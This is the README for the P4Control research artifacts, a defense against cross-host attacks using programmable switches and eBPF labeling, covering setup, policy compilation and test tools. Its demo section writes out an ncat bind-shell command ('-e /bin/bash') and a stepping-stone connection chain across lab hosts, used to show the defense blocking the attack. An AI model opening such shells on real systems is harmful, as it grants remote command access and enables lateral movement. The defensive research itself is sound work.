This repository contains the artifacts for the paper titled "P4Control: Line-Rate Cross-Host Attack Prevention via In-Network Information Flow Control Enabled by Programmable Switches and eBPF", accepted at 45th IEEE Symposium on Security and Privacy (IEEE S&P / Oakland), 2024. For questions, please reach out to Osama Bajaber.
- Python 3.7
- Tofino Switch SDE 9.7.0
- BCC (Linux 5.15.0)
- Bison 3.8.2
- Flex 2.6.4
- Scapy 2.4.5
The current settings assume three hosts linked to the Tofino switch, each assigned the following IP address and label (adjust these settings to match your topology):
- Host1, 10.0.0.1, Label={HOST1}
- Host2, 10.0.0.2, Label={HOST2}
- Host3, 10.0.0.3, Label={HOST3}
Ensure that the Tofino switch SDE is installed and set the environment variables `SDE=~/bf-sde-9.7.0/` and `SDE_INSTALL=~/bf-sde-9.7.0/install`. Note: the `p4_build.sh` and `run_switchd.sh` scripts can be found within your SDE directory `/bf-sde-9.7.0/`.
Step 1: Build the P4 program: `./p4_build.sh -p switch/p4control.p4`
Step 2: Run the switch program on the Tofino switch: `./run_switchd.sh -p p4control`
Step 3: Start the control plane: `python3 switch/controller.py`
This will load P4Control in the designated Tofino switch and run the control plane. The current control plane code inserts the NetCL policies needed to block traffic between Host1 and Host3.
Now that the switch program is running, load the eBPF host agent on the hosts. We tested the host agent on Ubuntu 20.04.1 LTS, but it should work with other versions. Make sure to set the correct interface name in `host_agent/host_agent.py`.
Step 0: `host_agent/host_agent_ebpf.c` provides the ability to manually label a specific PID with a custom DIFC label for easy configuration. In your open terminal, check the PID of the current bash process by running `ps`. Copy the PID of the bash process into the `TAGGED_TERMINAL` variable defined at the top of `host_agent/host_agent_ebpf.c`: `u32 TAGGED_TERMINAL = <PID>;`
Step 1: Run the host agent on all three hosts. The following command attaches all the needed eBPF programs inside the kernel: `python3 host_agent/host_agent.py`
To perform a cross-host attack from Host1 to Host3, using Host2 as a stepping stone:
Step 1: On Host2 and Host3, start a `ncat` listener: `sudo ncat -nlvp 9999 -e /bin/bash`
Step 2: From Host1, connect to Host2: `sudo ncat 10.0.0.2 9999`
Step 3: From Host1, establish a session to Host3 through Host2: `ncat 10.0.0.3 9999`
P4Control will block the last connection because the label {HOST1} is detected on it.
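To illustrate why the stepping-stone connection is blocked, here is an added Python model of the DIFC label propagation described above; it is not P4Control's own code. The label names follow the topology settings above, while the deny-rule encoding and the `Process`/`connect` helpers are assumptions made for this illustration.

```python
# Added example: minimal model of DIFC label propagation across hosts.
# Not P4Control's code; label names and the policy encoding are assumptions.
from dataclasses import dataclass, field

HOSTS = {"10.0.0.1": "HOST1", "10.0.0.2": "HOST2", "10.0.0.3": "HOST3"}

# Assumed NetCL-style deny rule: any flow whose label carries HOST1
# must not reach HOST3 (this is what the controller installs on the switch).
DENY_RULES = [({"HOST1"}, "HOST3")]


@dataclass
class Process:
    host: str                                # IP of the host the process runs on
    label: set = field(default_factory=set)  # DIFC label accumulated so far

    def __post_init__(self):
        # Every process starts with its own host's label.
        self.label = set(self.label) | {HOSTS[self.host]}


def switch_check(pkt_label, dst_ip):
    """Model the switch data plane: True if a packet with this label may pass."""
    dst = HOSTS[dst_ip]
    return not any(taint <= pkt_label and dst == target
                   for taint, target in DENY_RULES)


def connect(src, dst_ip, listener):
    """Model one connection; on success the listener inherits the sender's label
    (the host agent tags the shell spawned by the listener with that label)."""
    if not switch_check(src.label, dst_ip):
        return False
    listener.label |= src.label
    return True


def stepping_stone_scenario():
    h1, h2, h3 = Process("10.0.0.1"), Process("10.0.0.2"), Process("10.0.0.3")
    direct = switch_check(h1.label, "10.0.0.3")   # Host1 -> Host3 directly: blocked
    first = connect(h1, "10.0.0.2", h2)           # Host1 -> Host2: allowed
    second = connect(h2, "10.0.0.3", h3)          # Host2 now carries HOST1 -> blocked
    return direct, first, second, sorted(h2.label)
```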
To compile NetCL rules:
Step 1: Run the following command: `./netcl-compile -i <netcl_rules> -o <compiled_rules>`
Step 2: To add the compiled rules to the switch, copy the content of `<compiled_rules>` into `switch/netcl.py` and re-run the control plane script: `python3 switch/controller.py`
We provide custom Scapy tools to send and receive customized packets with DIFC headers. These tools can be used to generate synthetic traffic to test the switch configuration.
Step 1: At the receiving host, run the following to start sniffing packets: `python3 custom-receive.py`
Step 2: At the sending host, run the following command to send the custom packet: `python3 custom-send.py <destination_IP> <label> <tracker> <message>`
If you like or use our work, please cite us using:
@inproceedings{bajaber2024p4control,
title={P4Control: Line-Rate Cross-Host Attack Prevention via In-Network Information Flow Control Enabled by Programmable Switches and eBPF},
author={Bajaber, Osama and Ji, Bo and Gao, Peng},
booktitle={IEEE Symposium on Security and Privacy (SP)},
year={2024},
}